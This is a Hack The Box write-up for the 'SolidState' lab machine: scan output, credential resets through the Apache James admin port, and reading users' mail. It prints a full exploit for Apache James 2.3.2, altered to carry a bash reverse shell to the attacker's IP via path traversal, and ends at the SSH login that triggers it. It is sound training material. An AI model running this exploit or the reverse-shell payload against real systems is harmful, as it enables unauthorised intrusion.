Thumbnail: gravatar

HacktheBox 'SolidState' writeup

by on under writeups
38 minute read

‘SolidState’ HTB Writeup

 

Host Information

Hostname IP Address Operating System Difficulty Level
SolidState 10.10.10.51 Linux Medium

SolidState HTB Card


 

view all writeups here

 


Writeup Contents:


 

Initial Recon

Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on a few other recent boxes - nmapAutomator. You can find and download the script here on Github.

Let’s run a full scan against the target:


root@kali:/writeups/HTB/solidstate/enumeration# nmapAutomator.sh 10.10.10.51 all



Running a all scan on 10.10.10.51

                                                                                                                                      

                                                                                                                                      

---------------------Starting Nmap Quick Scan---------------------                                                                    

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST

Nmap scan report for 10.10.10.51

Host is up (0.044s latency).

Not shown: 959 closed ports, 40 filtered ports

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT    STATE SERVICE

119/tcp open  nntp



Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds







---------------------Starting Nmap Basic Scan---------------------

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST

Nmap scan report for 10.10.10.51

Host is up (0.046s latency).



PORT    STATE SERVICE VERSION

119/tcp open  nntp    JAMES nntpd (posting ok)

Service Info: Host: solidstate



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds







----------------------Starting Nmap UDP Scan----------------------

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST

Warning: 10.10.10.51 giving up on port because retransmission cap hit (1).

Nmap scan report for 10.10.10.51

Host is up (0.039s latency).

All 1000 scanned ports on 10.10.10.51 are open|filtered (950) or closed (50)



Nmap done: 1 IP address (1 host up) scanned in 45.23 seconds







---------------------Starting Nmap Full Scan----------------------

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:03 CST

Initiating Parallel DNS resolution of 1 host. at 15:03

Completed Parallel DNS resolution of 1 host. at 15:03, 0.01s elapsed

Initiating SYN Stealth Scan at 15:03

Scanning 10.10.10.51 [65535 ports]

Discovered open port 80/tcp on 10.10.10.51

Discovered open port 110/tcp on 10.10.10.51

Discovered open port 25/tcp on 10.10.10.51

Discovered open port 22/tcp on 10.10.10.51

SYN Stealth Scan Timing: About 23.24% done; ETC: 15:05 (0:01:42 remaining)

SYN Stealth Scan Timing: About 46.49% done; ETC: 15:05 (0:01:10 remaining)

Discovered open port 4555/tcp on 10.10.10.51

SYN Stealth Scan Timing: About 69.37% done; ETC: 15:05 (0:00:40 remaining)

Discovered open port 119/tcp on 10.10.10.51

Completed SYN Stealth Scan at 15:05, 131.23s elapsed (65535 total ports)

Nmap scan report for 10.10.10.51

Host is up (0.042s latency).

Not shown: 65529 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

25/tcp   open  smtp

80/tcp   open  http

110/tcp  open  pop3

119/tcp  open  nntp

4555/tcp open  rsip



Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 131.34 seconds

           Raw packets sent: 65595 (2.886MB) | Rcvd: 65535 (2.621MB)





Making a script scan on extra ports: 22, 25, 80, 110, 4555

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:05 CST

Nmap scan report for 10.10.10.51

Host is up (0.037s latency).



PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

| ssh-hostkey: 

|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)

|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)

|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)

25/tcp   open  smtp        JAMES smtpd 2.3.2

|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.50 [10.10.14.50]), 

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: Home - Solid State Security

110/tcp  open  pop3        JAMES pop3d 2.3.2

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 23.23 seconds







---------------------Starting Nmap Vulns Scan---------------------

                                                                                                                                      

Running CVE scan on all ports

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:06 CST

Nmap scan report for 10.10.10.51

Host is up (0.039s latency).



PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

|_http-server-header: Apache/2.4.25 (Debian)

| vulners: 

|   cpe:/a:apache:http_server:2.4.25: 

|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679

|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668

|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169

|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167

|_      CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211

110/tcp  open  pop3        JAMES pop3d 2.3.2

119/tcp  open  nntp        JAMES nntpd (posting ok)

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds





Running Vuln scan on all ports

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:06 CST

Pre-scan script results:

| broadcast-avahi-dos: 

|   Discovered hosts:

|     224.0.0.251

|   After NULL UDP avahi packet DoS (CVE-2011-1002).

|_  Hosts are all up (not vulnerable).

Nmap scan report for 10.10.10.51

Host is up (0.038s latency).



PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

25/tcp   open  smtp        JAMES smtpd 2.3.2

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

| smtp-vuln-cve2010-4344: 

|_  The SMTP server is not Exim: NOT VULNERABLE

|_sslv2-drown: 

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

| http-csrf: 

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51

|   Found the following possible CSRF vulnerabilities: 

|     

|     Path: http://10.10.10.51:80/

|     Form id: name

|     Form action: #

|     

|     Path: http://10.10.10.51:80/about.html

|     Form id: name

|     Form action: #

|     

|     Path: http://10.10.10.51:80/services.html

|     Form id: name

|     Form action: #

|     

|     Path: http://10.10.10.51:80/index.html

|     Form id: name

|_    Form action: #

|_http-dombased-xss: Couldn't find any DOM based XSS.

| http-enum: 

|   /README.txt: Interesting, a readme.

|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'

|_http-server-header: Apache/2.4.25 (Debian)

| http-sql-injection: 

|   Possible sqli for queries:

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider

|_    http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

| vulners: 

|   cpe:/a:apache:http_server:2.4.25: 

|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679

|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668

|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169

|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167

|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211

|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312

|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715

|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082

|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788

|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217

|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098

|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081

|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220

|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196

|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199

|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333

|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798

|       CVE-2017-7659   5.0     https://vulners.com/cve/CVE-2017-7659

|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710

|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197

|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092

|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763

|_      CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283

110/tcp  open  pop3        JAMES pop3d 2.3.2

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

|_sslv2-drown: 

119/tcp  open  nntp        JAMES nntpd (posting ok)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

|_sslv2-drown: 

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 67.99 seconds







---------------------Recon Recommendations----------------------

                                                                                                                                      



Web Servers Recon:

                                                                                                                                      

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.51:80 -o recon/gobuster_10.10.10.51_80.txt

nikto -host 10.10.10.51:80 | tee recon/nikto_10.10.10.51_80.txt











Which commands would you like to run?                                                                                                 

All (Default), gobuster, nikto, Skip <!>



Running Default in (1) s:  





---------------------Running Recon Commands----------------------

                                                                                                                                      



Starting gobuster scan

                                                                                                                                      

===============================================================

Gobuster v3.0.1

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)

===============================================================

[+] Url:            http://10.10.10.51:80

[+] Threads:        30

[+] Wordlist:       /usr/share/wordlists/dirb/common.txt

[+] Status codes:   200,204,301,302,307,401,403

[+] User Agent:     gobuster/3.0.1

[+] Show length:    true

[+] Extensions:     html,php

[+] Expanded:       true

[+] Timeout:        10s

===============================================================

2020/02/01 15:07:54 Starting gobuster

===============================================================

http://10.10.10.51:80/.htaccess (Status: 403) [Size: 295]

http://10.10.10.51:80/.htaccess.html (Status: 403) [Size: 300]

http://10.10.10.51:80/.htaccess.php (Status: 403) [Size: 299]

http://10.10.10.51:80/.htpasswd (Status: 403) [Size: 295]

http://10.10.10.51:80/.htpasswd.php (Status: 403) [Size: 299]

http://10.10.10.51:80/.htpasswd.html (Status: 403) [Size: 300]

http://10.10.10.51:80/.hta (Status: 403) [Size: 290]

http://10.10.10.51:80/.hta.html (Status: 403) [Size: 295]

http://10.10.10.51:80/.hta.php (Status: 403) [Size: 294]

http://10.10.10.51:80/about.html (Status: 200) [Size: 7161]

http://10.10.10.51:80/assets (Status: 301) [Size: 311]

http://10.10.10.51:80/images (Status: 301) [Size: 311]

http://10.10.10.51:80/index.html (Status: 200) [Size: 7774]

http://10.10.10.51:80/index.html (Status: 200) [Size: 7774]

http://10.10.10.51:80/server-status (Status: 403) [Size: 299]

http://10.10.10.51:80/services.html (Status: 200) [Size: 8398]

===============================================================

2020/02/01 15:08:32 Finished

===============================================================



Finished gobuster scan

                                                                                                                                      

=========================

                                                                                                                                      

Starting nikto scan

                                                                                                                                      

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.10.10.51

+ Target Hostname:    10.10.10.51

+ Target Port:        80

+ Start Time:         2020-02-01 15:08:32 (GMT-6)

---------------------------------------------------------------------------

+ Server: Apache/2.4.25 (Debian)

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.

+ Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5610a1e7a4c9b, mtime: gzip

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 

+ OSVDB-3268: /images/: Directory indexing found.

+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.

+ OSVDB-3233: /icons/README: Apache default file found.

+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host

+ End Time:           2020-02-01 15:14:08 (GMT-6) (336 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested



Finished nikto scan

                                                                                                                                      

=========================

                                                                                                                                      

                                                                                                                                      

                                                                                                                                      

---------------------Finished all Nmap scans---------------------                                                                     

                                                                                                                                      



Completed in 11 minute(s) and 36 second(s)

OK, interesting, looks like we have a number of things we can look at - HTTP and SSH are open on their standard ports, and we also have a SMTP service running, as well as a Network News Transfer Protocol, POP3, and a James Remote Admin port. Let’s check out HTTP first, to see if there are any clues, then we can work our way through each of these services to see if there are known exploits, if not. We know that we’re running Apache 2.4.25 on Debian Linux.

 

checking out HTTP

Upon visiting the swebsite on port 80, we’re greeted with a pretty slick dynamic looking web page:

SolidState main page

There doesn’t seem to be anything super obvious on the website that might serve as a hint; there’s a few fields that could potentially provide avenues for XSS or SQLi, but let’s keep enumerating for now. Nothing of interest seemed to show up in the images or assets directories, and the README.txt just confirms that the site is HTML5 and gives some copyright notices. Let’s move on.

 

checking out James Remote Admin

Let’s take a look at the James Remote Admin port next, as I’m not familiar with what that does. I’m guessing this has to do something with remote mail/tool suite adminstration, as both the SMTP and POP3 and NNTP were labled as James. A quick search seems to indicate that this is an Apache suite of tools.

A quick searchsploit search for the James version shown by nmap reveals only one result:


oot@kali:/writeups/HTB/solidstate/enumeration# searchsploit james 2.3.2

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

 Exploit Title                                                                                                                                    |  Path

                                                                                                                                                  | (/usr/share/exploitdb/)

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Apache James Server 2.3.2 - Remote Command Execution                                                                                              | exploits/linux/remote/35513.py

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result

A quick look at the code with searchsploit -x seems to reveal it to be an authenticated remote command execution explioit - that’s a bummer, as we don’t have credentials. Looks like there’s a default of root / root provided in the exploit, so we can go ahead and try that on the off-chance that the service suite has default (or easy to guess) credentials enabled. If not, we’ll either have to find a way to get likely credentials (from the Apache HTTP server, or another service) or try another exploit.

 

running an initial exploit

Let’s go ahead and download the exploit locally.


  Exploit: Apache James Server 2.3.2 - Remote Command Execution

      URL: https://www.exploit-db.com/exploits/35513

     Path: /usr/share/exploitdb/exploits/linux/remote/35513.py

File Type: Python script, ASCII text executable, with CRLF line terminators



Copied to: /writeups/HTB/solidstate/exploits/35513.py





root@kali:/writeups/HTB/solidstate/exploits# mv 35513.py james_rce.py

Looks like there are two options within the exploit - one to run the payload as root, the others to deliver the payload as any user. Since we don’t know what user we’ll log in as let’s put the payload delivery as any user. Looks like the default apache james remote management credentials root/root are already provided, and that’s the only credentials we’re aware of, so let’s leave that. By default it looks like the payload is placing a proof.txt file in either /root/proof.txt for root, or /tmp/proof.txt for any user. So let’s modify that file creation to throw a reverse shell.

Here’s the code for our modified exploit:


#!/usr/bin/python

#

# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution

# Date: 16\10\2014

# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec

# Vendor Homepage: http://james.apache.org/server/

# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip

# Version: Apache James Server 2.3.2

# Tested on: Ubuntu, Debian

# Info: This exploit works on default installation of Apache James Server 2.3.2

# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d



import socket

import sys

import time



# specify payload

payload = 'bash -i >& /dev/tcp/10.10.14.50/43110 0>&1' # to exploit on any user 

#payload = '[ "$(id -u)" == "0" ] && bash -i >& /dev/tcp/10.10.14.50/43110 0>&1' # to exploit only on root

# credentials to James Remote Administration Tool (Default - root/root)

user = 'root'

pwd = 'root'



if len(sys.argv) != 2:

    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])

    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])

    sys.exit(1)



ip = sys.argv[1]



def recv(s):

        s.recv(1024)

        time.sleep(0.2)



try:

    print "[+]Connecting to James Remote Administration Tool..."

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    s.connect((ip,4555))

    s.recv(1024)

    s.send(user + "\n")

    s.recv(1024)

    s.send(pwd + "\n")

    s.recv(1024)

    print "[+]Creating user..."

    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")

    s.recv(1024)

    s.send("quit\n")

    s.close()



    print "[+]Connecting to James SMTP server..."

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    s.connect((ip,25))

    s.send("ehlo team@team.pl\r\n")

    recv(s)

    print "[+]Sending payload..."

    s.send("mail from: <'@team.pl>\r\n")

    recv(s)

    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found

    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")

    recv(s)

    s.send("data\r\n")

    recv(s)

    s.send("From: team@team.pl\r\n")

    s.send("\r\n")

    s.send("'\n")

    s.send(payload + "\n")

    s.send("\r\n.\r\n")

    recv(s)

    s.send("quit\r\n")

    recv(s)

    s.close()

    print "[+]Done! Payload will be executed once somebody logs in."

except:

    print "Connection failed."

OK, let’s go ahead and start a listener locally with nc -lvnp 43110 to catch our shell, on the off-chance the default creds actually work.

Now let’s give it a run:


root@kali:/writeups/HTB/solidstate/exploits# python james_rce.py 10.10.10.51

[+]Connecting to James Remote Administration Tool...

[+]Creating user...

[+]Connecting to James SMTP server...

[+]Sending payload...

[+]Done! Payload will be executed once somebody logs in.

OK, so that actually might have worked; at the least, it didn’t error out, which probably means the default credentials worked. However, we notice the payload won’t be executed until somebody logs in. Let’s see if we can log in to the adminstration port, or another James service (such as SMTP or POP3) with root / root ourselves, to see if we can find a way further into the system to have the payload run.

Looks like going to the remote adminstration port over a browser doesn’t load.

 

a slight misstep

Let’s try another service to see if we can authenticate. I seem to remember that SMTP by default can be accessed via telnet, so let’s try that first. I don’t remember the exact syntax, I think you have to somehow send a SYN type message to the server first, then authenticate. A quick search turns up a pretty good guide on how to authenticate over telnet. Let’s go ahead and connect to and greet the server:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 25

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Sun, 2 Feb 2020 14:51:58 -0500 (EST)

EHLO 10.10.10.51

250-solidstate Hello 10.10.10.51 (10.10.14.50 [10.10.14.50])

250-PIPELINING

250 ENHANCEDSTATUSCODES



OK, now it looks like we need to base64 encode our crendetials before passing them with AUTH LOGIN. Since our username and password is the same, we just need to run the following in a new local shell:


root@kali:~# echo "root" | base64

cm9vdAo=

Now let’s give passing the creds to SMTP a shot:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 25

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Sun, 2 Feb 2020 14:58:02 -0500 (EST)

EHLO 10.10.10.51

250-solidstate Hello 10.10.10.51 (10.10.14.50 [10.10.14.50])

250-PIPELINING

250 ENHANCEDSTATUSCODES

AUTH LOGIN

334 VXNlcm5hbWU6

cm9vdAo=

334 UGFzc3dvcmQ6

cm9vdAo=

535 Authentication Failed

Bummer, that didn’t seem to work.

 

finding further information through compromised accounts

Let’s try something else. Let’s see if we can log directly in to the remote administration port with telnet:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

OK, that was a lot more straightforward, I probably should have tried that first.

It looks like the listener has not caught a shell. But taking another look at the exploit, it looks like it used SMTP to send the payload, so we’ll probably need to log in as a user to the POP3 service, in order for the payload to fire. Let’s see what we can do anything further with the James Remote Adminstration login. There seems to be a good list of valid James Remote Amin commands on this site, so let’s see if we can list the users, change a password for one, then log in as them to POP3, to see if that causes the listener to get a shell.


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

listusers

Existing accounts 6

user: james

user: ../../../../../../../../etc/bash_completion.d

user: thomas

user: john

user: mindy

user: mailadmin

OK, looks like we got a list of users. and looks like the user showing as bash_completion.d is an artifact of the RCE exploit we ran earlier. Let’s try to change Thomas’s credentials and log in as him to POP3.


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

setpassword thomas letmein

Password for thomas reset



OK, now let’s see if we can use POP3 similar to SMTP, and log in as thomas over telnet.


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

USER thomas

+OK

PASS letmein

+OK Welcome thomas

Awesome, it worked, we’re connected as Thomas. No shell on netcat, Maybe the RCE paylaod will get fired on an login to the server itself, such as using ssh; that might make more sense. Let’s see if we can read some emails, if there’s any, to find further clues. Maybe a hint on how to log in to the server. Changing thomas’s password only changed it for the POP3 service, not the server itself, so we’ll need different creds if we’re going to SSH. Using the LIST command in POP3, it looks like Thomas has no emails:


Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

USER thomas

+OK

PASS letmein

+OK Welcome thomas

LIST

+OK 0 0

.



Let’s go through each user and reset their password, like above, log in, and see if we can find anything; if not, we’ll have to try a different avenue.

After resetting john’s password, and logging in to his mailbox, we see a promising clue:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

user john

+OK

pass letmein

+OK Welcome john

list

+OK 1 743

1 743

.

RETR 1

+OK Message follows

Return-Path: <mailadmin@localhost>

Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: john@localhost

Received: from 192.168.11.142 ([192.168.11.142])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581

          for <john@localhost>;

          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)

Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)

From: mailadmin@localhost

Subject: New Hires access

John, 



Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.



Thank you in advance.



Respectfully,

James



.



Great, so maybe Mindy will have access to the server; if we can ssh as her, hopefully the exploit will fire off and give us a shell on the box. Let’s go ahead and reset her POP3 credentials, and see if there’s any emails in her account:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

setpassword mindy getmeashell

Password for mindy reset

^]

telnet> Connection closed.

root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

user mindy

+OK

pass getmeashell

+OK Welcome mindy

list

+OK 2 1945

1 1109

2 836

.

RETR 1

+OK Message follows

Return-Path: <mailadmin@localhost>

Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: mindy@localhost

Received: from 192.168.11.142 ([192.168.11.142])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798

          for <mindy@localhost>;

          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)

Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)

From: mailadmin@localhost

Subject: Welcome



Dear Mindy,

Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.



We are looking forward to you joining our team and your success at Solid State Security. 



Respectfully,

James

.

RETR 2

+OK Message follows

Return-Path: <mailadmin@localhost>

Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: mindy@localhost

Received: from 192.168.11.142 ([192.168.11.142])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581

          for <mindy@localhost>;

          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)

Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)

From: mailadmin@localhost

Subject: Your Access



Dear Mindy,





Here are your ssh credentials to access the system. Remember to reset your password after your first login. 

Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 



username: mindy

pass: P@55W0rd1!2@



Respectfully,

James



.



^]

telnet> Connection closed.

Awesome, looks like we have some credentials that might work. Let’s try ssh’ing into the box as mindy with the creds mindy / P@55W0rd1!2@ . If this works, like it said in the email, our access as Mindy will likely be limited, so let’s hope the James RCE exploit works, fires off the payload, and gives us a less restrictive shell.

Let’s check it out.

 

gaining a foothold

 

getting a user shell

Let’s try logging in as Mindy on ssh:


root@kali:/writeups/HTB/solidstate/exploits# ssh mindy@10.10.10.51

mindy@10.10.10.51's password: 

Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686



The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.



Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142

-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found

-rbash: L: command not found

-rbash: attributestLjava/util/HashMap: No such file or directory

-rbash: L

         errorMessagetLjava/lang/String: No such file or directory

-rbash: L

         lastUpdatedtLjava/util/Date: No such file or directory

-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory

-rbash: $'L\004nameq~\002L': command not found

-rbash: recipientstLjava/util/Collection: No such file or directory

-rbash: L: command not found

